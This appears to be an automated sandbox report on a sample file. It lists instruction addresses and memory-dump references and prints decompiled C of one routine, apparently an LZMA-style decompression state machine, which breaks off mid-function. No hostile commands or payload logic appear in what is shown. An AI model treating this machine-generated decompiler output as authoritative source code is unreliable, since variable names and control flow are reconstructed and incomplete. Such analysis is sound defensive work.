                                                                                            0x0040631a
                                                                                            0x0040631d
                                                                                            0x00406320
                                                                                            0x00406323
                                                                                            0x00406326
                                                                                            0x00406328
                                                                                            0x0040632f
                                                                                            0x00406330
                                                                                            0x00406332
                                                                                            0x00406335
                                                                                            0x00406338
                                                                                            0x0040633b
                                                                                            0x0040633b
                                                                                            0x00406340
                                                                                            0x00000000
                                                                                            0x00406340
                                                                                            0x004062f1
                                                                                            0x004062f4
                                                                                            0x004062f7
                                                                                            0x00406301
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406355
                                                                                            0x00406359
                                                                                            0x0040637c
                                                                                            0x0040637f
                                                                                            0x00406382
                                                                                            0x0040638c
                                                                                            0x0040635b
                                                                                            0x0040635b
                                                                                            0x0040635e
                                                                                            0x00406361
                                                                                            0x00406364
                                                                                            0x00406371
                                                                                            0x00406374
                                                                                            0x00406374
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406409
                                                                                            0x0040640d
                                                                                            0x00406414
                                                                                            0x00406417
                                                                                            0x0040641a
                                                                                            0x00406424
                                                                                            0x00000000
                                                                                            0x00406424
                                                                                            0x0040640f
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406430
                                                                                            0x00406434
                                                                                            0x0040643b
                                                                                            0x0040643e
                                                                                            0x00406441
                                                                                            0x00406436
                                                                                            0x00406436
                                                                                            0x00406436
                                                                                            0x00406444
                                                                                            0x00406447
                                                                                            0x0040644a
                                                                                            0x0040644a
                                                                                            0x0040644d
                                                                                            0x00406450
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004064f0
                                                                                            0x004064f0
                                                                                            0x004064f4
                                                                                            0x00406892
                                                                                            0x00000000
                                                                                            0x00406892
                                                                                            0x004064fa
                                                                                            0x004064fd
                                                                                            0x00406500
                                                                                            0x00406504
                                                                                            0x00406507
                                                                                            0x0040650d
                                                                                            0x0040650f
                                                                                            0x0040650f
                                                                                            0x0040650f
                                                                                            0x00406512
                                                                                            0x00406515
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004060e5
                                                                                            0x004060e5
                                                                                            0x004060e9
                                                                                            0x00406856
                                                                                            0x00000000
                                                                                            0x00406856
                                                                                            0x004060ef
                                                                                            0x004060f2
                                                                                            0x004060f5
                                                                                            0x004060f9
                                                                                            0x004060fc
                                                                                            0x00406102
                                                                                            0x00406104
                                                                                            0x00406104
                                                                                            0x00406104
                                                                                            0x00406107
                                                                                            0x0040610a
                                                                                            0x0040610a
                                                                                            0x0040610d
                                                                                            0x00406110
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406116
                                                                                            0x0040611c
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406122
                                                                                            0x00406122
                                                                                            0x00406126
                                                                                            0x00406129
                                                                                            0x0040612c
                                                                                            0x0040612f
                                                                                            0x00406132
                                                                                            0x00406133
                                                                                            0x00406136
                                                                                            0x00406138
                                                                                            0x0040613e
                                                                                            0x00406141
                                                                                            0x00406144
                                                                                            0x00406147
                                                                                            0x0040614a
                                                                                            0x0040614d
                                                                                            0x00406150
                                                                                            0x0040616c
                                                                                            0x0040616f
                                                                                            0x00406172
                                                                                            0x00406175
                                                                                            0x0040617c
                                                                                            0x00406180
                                                                                            0x00406182
                                                                                            0x00406186
                                                                                            0x00406152
                                                                                            0x00406152
                                                                                            0x00406156
                                                                                            0x0040615e
                                                                                            0x00406163
                                                                                            0x00406165
                                                                                            0x00406167
                                                                                            0x00406167
                                                                                            0x00406189
                                                                                            0x00406190
                                                                                            0x00406193
                                                                                            0x00000000
                                                                                            0x00406199
                                                                                            0x00000000
                                                                                            0x00406199
                                                                                            0x00000000
                                                                                            0x0040619e
                                                                                            0x0040619e
                                                                                            0x004061a2
                                                                                            0x00406862
                                                                                            0x00000000
                                                                                            0x00406862
                                                                                            0x004061a8
                                                                                            0x004061ab
                                                                                            0x004061ae
                                                                                            0x004061b2
                                                                                            0x004061b5
                                                                                            0x004061bb
                                                                                            0x004061bd
                                                                                            0x004061bd
                                                                                            0x004061bd
                                                                                            0x004061c0
                                                                                            0x004061c3
                                                                                            0x004061c3
                                                                                            0x004061c3
                                                                                            0x004061c9
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004061cb
                                                                                            0x004061ce
                                                                                            0x004061d1
                                                                                            0x004061d4
                                                                                            0x004061d7
                                                                                            0x004061da
                                                                                            0x004061dd
                                                                                            0x004061e0
                                                                                            0x004061e3
                                                                                            0x004061e6
                                                                                            0x004061e9
                                                                                            0x00406201
                                                                                            0x00406204
                                                                                            0x00406207
                                                                                            0x0040620a
                                                                                            0x0040620a
                                                                                            0x0040620d
                                                                                            0x00406211
                                                                                            0x00406213
                                                                                            0x004061eb
                                                                                            0x004061eb
                                                                                            0x004061f3
                                                                                            0x004061f8
                                                                                            0x004061fa
                                                                                            0x004061fc
                                                                                            0x004061fc
                                                                                            0x00406216
                                                                                            0x0040621d
                                                                                            0x00406220
                                                                                            0x00000000
                                                                                            0x00406222
                                                                                            0x00000000
                                                                                            0x00406222
                                                                                            0x00406220
                                                                                            0x00406227
                                                                                            0x00406227
                                                                                            0x00406227
                                                                                            0x00406227
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406262
                                                                                            0x00406262
                                                                                            0x00406266
                                                                                            0x0040686e
                                                                                            0x00000000
                                                                                            0x0040686e
                                                                                            0x0040626c
                                                                                            0x0040626f
                                                                                            0x00406272
                                                                                            0x00406276
                                                                                            0x00406279
                                                                                            0x0040627f
                                                                                            0x00406281
                                                                                            0x00406281
                                                                                            0x00406281
                                                                                            0x00406284
                                                                                            0x00406287
                                                                                            0x00406287
                                                                                            0x0040628d
                                                                                            0x0040622b
                                                                                            0x0040622b
                                                                                            0x0040622e
                                                                                            0x00000000
                                                                                            0x0040622e
                                                                                            0x0040628f
                                                                                            0x0040628f
                                                                                            0x00406292
                                                                                            0x00406295
                                                                                            0x00406298
                                                                                            0x0040629b
                                                                                            0x0040629e
                                                                                            0x004062a1
                                                                                            0x004062a4
                                                                                            0x004062a7
                                                                                            0x004062aa
                                                                                            0x004062ad
                                                                                            0x004062c5
                                                                                            0x004062c8
                                                                                            0x004062cb
                                                                                            0x004062ce
                                                                                            0x004062ce
                                                                                            0x004062d1
                                                                                            0x004062d5
                                                                                            0x004062d7
                                                                                            0x004062af
                                                                                            0x004062af
                                                                                            0x004062b7
                                                                                            0x004062bc
                                                                                            0x004062be
                                                                                            0x004062c0
                                                                                            0x004062c0
                                                                                            0x004062da
                                                                                            0x004062e1
                                                                                            0x004062e4
                                                                                            0x00000000
                                                                                            0x004062e6
                                                                                            0x00000000
                                                                                            0x004062e6
                                                                                            0x00000000
                                                                                            0x00406573
                                                                                            0x00406573
                                                                                            0x00406577
                                                                                            0x0040689e
                                                                                            0x00000000
                                                                                            0x0040689e
                                                                                            0x0040657d
                                                                                            0x00406580
                                                                                            0x00406583
                                                                                            0x00406587
                                                                                            0x0040658a
                                                                                            0x00406590
                                                                                            0x00406592
                                                                                            0x00406592
                                                                                            0x00406592
                                                                                            0x00406595
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406682
                                                                                            0x00406686
                                                                                            0x004066a8
                                                                                            0x004066ab
                                                                                            0x004066b5
                                                                                            0x00000000
                                                                                            0x004066b5
                                                                                            0x00406688
                                                                                            0x0040668b
                                                                                            0x0040668f
                                                                                            0x00406692
                                                                                            0x00406692
                                                                                            0x00406695
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040673f
                                                                                            0x00406743
                                                                                            0x00406761
                                                                                            0x00406761
                                                                                            0x00406761
                                                                                            0x00406768
                                                                                            0x0040676f
                                                                                            0x00406776
                                                                                            0x00406776
                                                                                            0x00000000
                                                                                            0x00406776
                                                                                            0x00406745
                                                                                            0x00406748
                                                                                            0x0040674b
                                                                                            0x0040674e
                                                                                            0x00406755
                                                                                            0x00406699
                                                                                            0x00406699
                                                                                            0x0040669c
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406830
                                                                                            0x00406833
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040646a
                                                                                            0x0040646c
                                                                                            0x00406473
                                                                                            0x00406474
                                                                                            0x00406476
                                                                                            0x00406479
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406481
                                                                                            0x00406484
                                                                                            0x00406487
                                                                                            0x00406489
                                                                                            0x0040648b
                                                                                            0x0040648b
                                                                                            0x0040648c
                                                                                            0x0040648f
                                                                                            0x00406496
                                                                                            0x00406499
                                                                                            0x004064a7
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040677d
                                                                                            0x0040677d
                                                                                            0x00406780
                                                                                            0x00406787
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040678c
                                                                                            0x0040678c
                                                                                            0x00406790
                                                                                            0x004068c8
                                                                                            0x00000000
                                                                                            0x004068c8
                                                                                            0x00406796
                                                                                            0x00406799
                                                                                            0x0040679c
                                                                                            0x004067a0
                                                                                            0x004067a3
                                                                                            0x004067a9
                                                                                            0x004067ab
                                                                                            0x004067ab
                                                                                            0x004067ab
                                                                                            0x004067ae
                                                                                            0x004067b1
                                                                                            0x004067b1
                                                                                            0x004067b1
                                                                                            0x004067b1
                                                                                            0x004067b4
                                                                                            0x004067b4
                                                                                            0x004067b8
                                                                                            0x00406818
                                                                                            0x0040681b
                                                                                            0x00406820
                                                                                            0x00406821
                                                                                            0x00406823
                                                                                            0x00406825
                                                                                            0x00406828
                                                                                            0x00000000
                                                                                            0x00406828
                                                                                            0x004067ba
                                                                                            0x004067c0
                                                                                            0x004067c3
                                                                                            0x004067c6
                                                                                            0x004067c9
                                                                                            0x004067cc
                                                                                            0x004067cf
                                                                                            0x004067d2
                                                                                            0x004067d5
                                                                                            0x004067d8
                                                                                            0x004067db
                                                                                            0x004067f4
                                                                                            0x004067f7
                                                                                            0x004067fa
                                                                                            0x004067fd
                                                                                            0x00406801
                                                                                            0x00406803
                                                                                            0x00406803
                                                                                            0x00406804
                                                                                            0x00406807
                                                                                            0x004067dd
                                                                                            0x004067dd
                                                                                            0x004067e5
                                                                                            0x004067ea
                                                                                            0x004067ec
                                                                                            0x004067ef
                                                                                            0x004067ef
                                                                                            0x0040680a
                                                                                            0x00406811
                                                                                            0x00000000
                                                                                            0x00406813
                                                                                            0x00000000
                                                                                            0x00406813
                                                                                            0x00000000
                                                                                            0x004064af
                                                                                            0x004064b2
                                                                                            0x004064e8
                                                                                            0x00406618
                                                                                            0x00406618
                                                                                            0x00406618
                                                                                            0x00406618
                                                                                            0x0040661b
                                                                                            0x0040661b
                                                                                            0x0040661e
                                                                                            0x00406620
                                                                                            0x004068aa
                                                                                            0x00000000
                                                                                            0x004068aa
                                                                                            0x00406626
                                                                                            0x00406629
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040662f
                                                                                            0x00406633
                                                                                            0x00406636
                                                                                            0x00406636
                                                                                            0x00406636
                                                                                            0x00000000
                                                                                            0x00406636
                                                                                            0x004064b4
                                                                                            0x004064b6
                                                                                            0x004064b8
                                                                                            0x004064ba
                                                                                            0x004064bd
                                                                                            0x004064be
                                                                                            0x004064c0
                                                                                            0x004064c2
                                                                                            0x004064c5
                                                                                            0x004064c8
                                                                                            0x004064de
                                                                                            0x004064e3
                                                                                            0x0040651b
                                                                                            0x0040651b
                                                                                            0x0040651f
                                                                                            0x0040654b
                                                                                            0x0040654d
                                                                                            0x00406554
                                                                                            0x00406557
                                                                                            0x0040655a
                                                                                            0x0040655a
                                                                                            0x0040655f
                                                                                            0x0040655f
                                                                                            0x00406561
                                                                                            0x00406564
                                                                                            0x0040656b
                                                                                            0x0040656e
                                                                                            0x0040659b
                                                                                            0x0040659b
                                                                                            0x0040659e
                                                                                            0x004065a1
                                                                                            0x00406615
                                                                                            0x00406615
                                                                                            0x00406615
                                                                                            0x00000000
                                                                                            0x00406615
                                                                                            0x004065a3
                                                                                            0x004065a9
                                                                                            0x004065ac
                                                                                            0x004065af
                                                                                            0x004065b2
                                                                                            0x004065b5
                                                                                            0x004065b8
                                                                                            0x004065bb
                                                                                            0x004065be
                                                                                            0x004065c1
                                                                                            0x004065c4
                                                                                            0x004065dd
                                                                                            0x004065df
                                                                                            0x004065e2
                                                                                            0x004065e3
                                                                                            0x004065e6
                                                                                            0x004065e8
                                                                                            0x004065eb
                                                                                            0x004065ed
                                                                                            0x004065ef
                                                                                            0x004065f2
                                                                                            0x004065f4
                                                                                            0x004065f7
                                                                                            0x004065fb
                                                                                            0x004065fd
                                                                                            0x004065fd
                                                                                            0x004065fe
                                                                                            0x00406601
                                                                                            0x00406604
                                                                                            0x004065c6
                                                                                            0x004065c6
                                                                                            0x004065ce
                                                                                            0x004065d3
                                                                                            0x004065d5
                                                                                            0x004065d8
                                                                                            0x004065d8
                                                                                            0x00406607
                                                                                            0x0040660e
                                                                                            0x00406598
                                                                                            0x00406598
                                                                                            0x00406598
                                                                                            0x00406598
                                                                                            0x00000000
                                                                                            0x00406610
                                                                                            0x00000000
                                                                                            0x00406610
                                                                                            0x0040660e
                                                                                            0x00406521
                                                                                            0x00406524
                                                                                            0x00406526
                                                                                            0x00406529
                                                                                            0x0040652c
                                                                                            0x0040652f
                                                                                            0x00406531
                                                                                            0x00406534
                                                                                            0x00406537
                                                                                            0x00406537
                                                                                            0x0040653a
                                                                                            0x0040653a
                                                                                            0x0040653d
                                                                                            0x00406544
                                                                                            0x00406518
                                                                                            0x00406518
                                                                                            0x00406518
                                                                                            0x00406518
                                                                                            0x00000000
                                                                                            0x00406546
                                                                                            0x00000000
                                                                                            0x00406546
                                                                                            0x00406544
                                                                                            0x004064ca
                                                                                            0x004064cd
                                                                                            0x004064cf
                                                                                            0x004064d2
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406231
                                                                                            0x00406231
                                                                                            0x00406235
                                                                                            0x0040687a
                                                                                            0x00000000
                                                                                            0x0040687a
                                                                                            0x0040623b
                                                                                            0x0040623e
                                                                                            0x00406241
                                                                                            0x00406244
                                                                                            0x00406247
                                                                                            0x0040624a
                                                                                            0x0040624d
                                                                                            0x0040624f
                                                                                            0x00406252
                                                                                            0x00406255
                                                                                            0x00406258
                                                                                            0x0040625a
                                                                                            0x0040625a
                                                                                            0x0040625a
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406639
                                                                                            0x00406639
                                                                                            0x00406639
                                                                                            0x0040663d
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406643
                                                                                            0x00406646
                                                                                            0x00406649
                                                                                            0x0040664c
                                                                                            0x0040664e
                                                                                            0x0040664e
                                                                                            0x0040664e
                                                                                            0x00406651
                                                                                            0x00406654
                                                                                            0x00406657
                                                                                            0x0040665a
                                                                                            0x0040665d
                                                                                            0x00406660
                                                                                            0x00406661
                                                                                            0x00406663
                                                                                            0x00406663
                                                                                            0x00406663
                                                                                            0x00406666
                                                                                            0x00406669
                                                                                            0x0040666c
                                                                                            0x0040666f
                                                                                            0x00406672
                                                                                            0x00406676
                                                                                            0x00406678
                                                                                            0x0040667b
                                                                                            0x00000000
                                                                                            0x0040667d
                                                                                            0x00000000
                                                                                            0x0040667d
                                                                                            0x0040667b
                                                                                            0x004068b0
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405edf

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.666527625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.666515944.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666540617.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666584246.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666656569.0000000000422000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666666204.0000000000429000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666680734.000000000042C000.00000002.00020000.sdmp Download File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 15aa086d42ea43156f7fbf6fbf97274f99b2efc4d47cfe7aa8cc3aef762d7e26
                                                                                            • Instruction ID: 22847fb14cdf7a24f95a3c84300c4786f150dfac54d3f328c430af40b2e48c23
                                                                                            • Opcode Fuzzy Hash: 15aa086d42ea43156f7fbf6fbf97274f99b2efc4d47cfe7aa8cc3aef762d7e26
                                                                                            • Instruction Fuzzy Hash: EB816871D04229CFDF24CFA8C844BAEBBB1FB44305F25816AD406BB281C7789A86DF54
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 98%
                                                                                            			E00405E9D(void* __ecx) {
                                                                                            				void* _v8;
                                                                                            				void* _v12;
                                                                                            				signed int _v16;
                                                                                            				unsigned int _v20;
                                                                                            				signed int _v24;
                                                                                            				signed int _v28;
                                                                                            				signed int _v32;
                                                                                            				signed int _v36;
                                                                                            				signed int _v40;
                                                                                            				signed int _v44;
                                                                                            				signed int _v48;
                                                                                            				signed int _v52;
                                                                                            				signed int _v56;
                                                                                            				signed int _v60;
                                                                                            				signed int _v64;
                                                                                            				signed int _v68;
                                                                                            				signed int _v72;
                                                                                            				signed int _v76;
                                                                                            				signed int _v80;
                                                                                            				signed int _v84;
                                                                                            				signed int _v88;
                                                                                            				signed int _v92;
                                                                                            				signed int _v95;
                                                                                            				signed int _v96;
                                                                                            				signed int _v100;
                                                                                            				signed int _v104;
                                                                                            				signed int _v108;
                                                                                            				signed int _v112;
                                                                                            				signed int _v116;
                                                                                            				signed int _v120;
                                                                                            				intOrPtr _v124;
                                                                                            				signed int _v128;
                                                                                            				signed int _v132;
                                                                                            				signed int _v136;
                                                                                            				void _v140;
                                                                                            				void* _v148;
                                                                                            				signed int _t537;
                                                                                            				signed int _t538;
                                                                                            				signed int _t572;
                                                                                            
                                                                                            				_t572 = 0x22;
                                                                                            				_v148 = __ecx;
                                                                                            				memcpy( &_v140, __ecx, _t572 << 2);
                                                                                            				if(_v52 == 0xffffffff) {
                                                                                            					return 1;
                                                                                            				}
                                                                                            				while(1) {
                                                                                            					L3:
                                                                                            					_t537 = _v140;
                                                                                            					if(_t537 > 0x1c) {
                                                                                            						break;
                                                                                            					}
                                                                                            					switch( *((intOrPtr*)(_t537 * 4 +  &M004068EF))) {
                                                                                            						case 0:
                                                                                            							__eflags = _v112;
                                                                                            							if(_v112 == 0) {
                                                                                            								goto L173;
                                                                                            							}
                                                                                            							_v112 = _v112 - 1;
                                                                                            							_v116 = _v116 + 1;
                                                                                            							_t537 =  *_v116;
                                                                                            							__eflags = _t537 - 0xe1;
                                                                                            							if(_t537 > 0xe1) {
                                                                                            								goto L174;
                                                                                            							}
                                                                                            							_t542 = _t537 & 0x000000ff;
                                                                                            							_push(0x2d);
                                                                                            							asm("cdq");
                                                                                            							_pop(_t576);
                                                                                            							_push(9);
                                                                                            							_pop(_t577);
                                                                                            							_t622 = _t542 / _t576;
                                                                                            							_t544 = _t542 % _t576 & 0x000000ff;
                                                                                            							asm("cdq");
                                                                                            							_t617 = _t544 % _t577 & 0x000000ff;
                                                                                            							_v64 = _t617;
                                                                                            							_v32 = (1 << _t622) - 1;
                                                                                            							_v28 = (1 << _t544 / _t577) - 1;
                                                                                            							_t625 = (0x300 << _t617 + _t622) + 0x736;
                                                                                            							__eflags = 0x600 - _v124;
                                                                                            							if(0x600 == _v124) {
                                                                                            								L12:
                                                                                            								__eflags = _t625;
                                                                                            								if(_t625 == 0) {
                                                                                            									L14:
                                                                                            									_v76 = _v76 & 0x00000000;
                                                                                            									_v68 = _v68 & 0x00000000;
                                                                                            									goto L17;
                                                                                            								} else {
                                                                                            									goto L13;
                                                                                            								}
                                                                                            								do {
                                                                                            									L13:
                                                                                            									_t625 = _t625 - 1;
                                                                                            									__eflags = _t625;
                                                                                            									 *((short*)(_v8 + _t625 * 2)) = 0x400;
                                                                                            								} while (_t625 != 0);
                                                                                            								goto L14;
                                                                                            							}
                                                                                            							__eflags = _v8;
                                                                                            							if(_v8 != 0) {
                                                                                            								GlobalFree(_v8);
                                                                                            							}
                                                                                            							_t537 = GlobalAlloc(0x40, 0x600); // executed
                                                                                            							__eflags = _t537;
                                                                                            							_v8 = _t537;
                                                                                            							if(_t537 == 0) {
                                                                                            								goto L174;
                                                                                            							} else {
                                                                                            								_v124 = 0x600;
                                                                                            								goto L12;
                                                                                            							}
                                                                                            						case 1:
                                                                                            							L15:
                                                                                            							__eflags = _v112;
                                                                                            							if(_v112 == 0) {
                                                                                            								_v140 = 1;
                                                                                            								goto L173;
                                                                                            							}
                                                                                            							_v112 = _v112 - 1;
                                                                                            							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
                                                                                            							_v116 = _v116 + 1;
                                                                                            							_t50 =  &_v76;
                                                                                            							 *_t50 = _v76 + 1;
                                                                                            							__eflags =  *_t50;
                                                                                            							L17:
                                                                                            							__eflags = _v76 - 4;
                                                                                            							if(_v76 < 4) {
                                                                                            								goto L15;
                                                                                            							}
                                                                                            							_t550 = _v68;
                                                                                            							__eflags = _t550 - _v120;
                                                                                            							if(_t550 == _v120) {
                                                                                            								L22:
                                                                                            								_v76 = 5;
                                                                                            								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
                                                                                            								goto L25;
                                                                                            							}
                                                                                            							__eflags = _v12;
                                                                                            							_v120 = _t550;
                                                                                            							if(_v12 != 0) {
                                                                                            								GlobalFree(_v12);
                                                                                            							}
                                                                                            							_t537 = GlobalAlloc(0x40, _v68); // executed
                                                                                            							__eflags = _t537;
                                                                                            							_v12 = _t537;
                                                                                            							if(_t537 == 0) {
                                                                                            								goto L174;
                                                                                            							} else {
                                                                                            								goto L22;
                                                                                            							}
                                                                                            						case 2:
                                                                                            							L26:
                                                                                            							_t557 = _v100 & _v32;
                                                                                            							_v136 = 6;
                                                                                            							_v80 = _t557;
                                                                                            							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
                                                                                            							goto L135;
                                                                                            						case 3:
                                                                                            							L23:
                                                                                            							__eflags = _v112;
                                                                                            							if(_v112 == 0) {
                                                                                            								_v140 = 3;
                                                                                            								goto L173;
                                                                                            							}
                                                                                            							_v112 = _v112 - 1;
                                                                                            							_t72 =  &_v116;
                                                                                            							 *_t72 = _v116 + 1;
                                                                                            							__eflags =  *_t72;
                                                                                            							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                            							L25:
                                                                                            							_v76 = _v76 - 1;
                                                                                            							__eflags = _v76;
                                                                                            							if(_v76 != 0) {
                                                                                            								goto L23;
                                                                                            							}
                                                                                            							goto L26;
                                                                                            						case 4:
                                                                                            							L136:
                                                                                            							_t559 =  *_t626;
                                                                                            							_t610 = _t559 & 0x0000ffff;
                                                                                            							_t591 = (_v20 >> 0xb) * _t610;
                                                                                            							__eflags = _v16 - _t591;
                                                                                            							if(_v16 >= _t591) {
                                                                                            								_v20 = _v20 - _t591;
                                                                                            								_v16 = _v16 - _t591;
                                                                                            								_v68 = 1;
                                                                                            								_t560 = _t559 - (_t559 >> 5);
                                                                                            								__eflags = _t560;
                                                                                            								 *_t626 = _t560;
                                                                                            							} else {
                                                                                            								_v20 = _t591;
                                                                                            								_v68 = _v68 & 0x00000000;
                                                                                            								 *_t626 = (0x800 - _t610 >> 5) + _t559;
                                                                                            							}
                                                                                            							__eflags = _v20 - 0x1000000;
                                                                                            							if(_v20 >= 0x1000000) {
                                                                                            								goto L142;
                                                                                            							} else {
                                                                                            								goto L140;
                                                                                            							}
                                                                                            						case 5:
                                                                                            							L140:
                                                                                            							__eflags = _v112;
                                                                                            							if(_v112 == 0) {
                                                                                            								_v140 = 5;
                                                                                            								goto L173;
                                                                                            							}
                                                                                            							_v20 = _v20 << 8;
                                                                                            							_v112 = _v112 - 1;
                                                                                            							_t464 =  &_v116;
                                                                                            							 *_t464 = _v116 + 1;
                                                                                            							__eflags =  *_t464;
                                                                                            							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                            							L142:
                                                                                            							_t561 = _v136;
                                                                                            							goto L143;
                                                                                            						case 6:
                                                                                            							__edx = 0;
                                                                                            							__eflags = _v68;
                                                                                            							if(_v68 != 0) {
                                                                                            								__eax = _v8;
                                                                                            								__ecx = _v60;
                                                                                            								_v56 = 1;
                                                                                            								_v136 = 7;
                                                                                            								__esi = _v8 + 0x180 + _v60 * 2;
                                                                                            								goto L135;
                                                                                            							}
                                                                                            							__eax = _v96 & 0x000000ff;
                                                                                            							__esi = _v100;
                                                                                            							__cl = 8;
                                                                                            							__cl = 8 - _v64;
                                                                                            							__esi = _v100 & _v28;
                                                                                            							__eax = (_v96 & 0x000000ff) >> 8;
                                                                                            							__ecx = _v64;
                                                                                            							__esi = (_v100 & _v28) << 8;
                                                                                            							__ecx = _v8;
                                                                                            							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
                                                                                            							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
                                                                                            							__eflags = _v60 - 4;
                                                                                            							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                                                                                            							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                                                                                            							if(_v60 >= 4) {
                                                                                            								__eflags = _v60 - 0xa;
                                                                                            								if(_v60 >= 0xa) {
                                                                                            									_t103 =  &_v60;
                                                                                            									 *_t103 = _v60 - 6;
                                                                                            									__eflags =  *_t103;
                                                                                            								} else {
                                                                                            									_v60 = _v60 - 3;
                                                                                            								}
                                                                                            							} else {
                                                                                            								_v60 = 0;
                                                                                            							}
                                                                                            							__eflags = _v56 - __edx;
                                                                                            							if(_v56 == __edx) {
                                                                                            								__ebx = 0;
                                                                                            								__ebx = 1;
                                                                                            								goto L63;
                                                                                            							}
                                                                                            							__eax = _v24;
                                                                                            							__eax = _v24 - _v48;
                                                                                            							__eflags = __eax - _v120;
                                                                                            							if(__eax >= _v120) {
                                                                                            								__eax = __eax + _v120;
                                                                                            								__eflags = __eax;
                                                                                            							}
                                                                                            							__ecx = _v12;
                                                                                            							__ebx = 0;
                                                                                            							__ebx = 1;
                                                                                            							__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                            							_v95 =  *((intOrPtr*)(__eax + __ecx));
                                                                                            							goto L43;
                                                                                            						case 7:
                                                                                            							__eflags = _v68 - 1;
                                                                                            							if(_v68 != 1) {
                                                                                            								__eax = _v40;
                                                                                            								_v132 = 0x16;
                                                                                            								_v36 = _v40;
                                                                                            								__eax = _v44;
                                                                                            								_v40 = _v44;
                                                                                            								__eax = _v48;
                                                                                            								_v44 = _v48;
                                                                                            								__eax = 0;
                                                                                            								__eflags = _v60 - 7;
                                                                                            								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                            								__al = __al & 0x000000fd;
                                                                                            								__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                            								_v60 = (__eflags >= 0) - 1 + 0xa;
                                                                                            								__eax = _v8;
                                                                                            								__eax = _v8 + 0x664;
                                                                                            								__eflags = __eax;
                                                                                            								_v92 = __eax;
                                                                                            								goto L71;
                                                                                            							}
                                                                                            							__eax = _v8;
                                                                                            							__ecx = _v60;
                                                                                            							_v136 = 8;
                                                                                            							__esi = _v8 + 0x198 + _v60 * 2;
                                                                                            							goto L135;
                                                                                            						case 8:
                                                                                            							__eflags = _v68;
                                                                                            							if(_v68 != 0) {
                                                                                            								__eax = _v8;
                                                                                            								__ecx = _v60;
                                                                                            								_v136 = 0xa;
                                                                                            								__esi = _v8 + 0x1b0 + _v60 * 2;
                                                                                            							} else {
                                                                                            								__eax = _v60;
                                                                                            								__ecx = _v8;
                                                                                            								__eax = _v60 + 0xf;
                                                                                            								_v136 = 9;
                                                                                            								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
                                                                                            								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
                                                                                            							}
                                                                                            							goto L135;
                                                                                            						case 9:
                                                                                            							__eflags = _v68;
                                                                                            							if(_v68 != 0) {
                                                                                            								goto L92;
                                                                                            							}
                                                                                            							__eflags = _v100;
                                                                                            							if(_v100 == 0) {
                                                                                            								goto L174;
                                                                                            							}
                                                                                            							__eax = 0;
                                                                                            							__eflags = _v60 - 7;
                                                                                            							_t264 = _v60 - 7 >= 0;
                                                                                            							__eflags = _t264;
                                                                                            							0 | _t264 = _t264 + _t264 + 9;
                                                                                            							_v60 = _t264 + _t264 + 9;
                                                                                            							goto L78;
                                                                                            						case 0xa:
                                                                                            							__eflags = _v68;
                                                                                            							if(_v68 != 0) {
                                                                                            								__eax = _v8;
                                                                                            								__ecx = _v60;
                                                                                            								_v136 = 0xb;
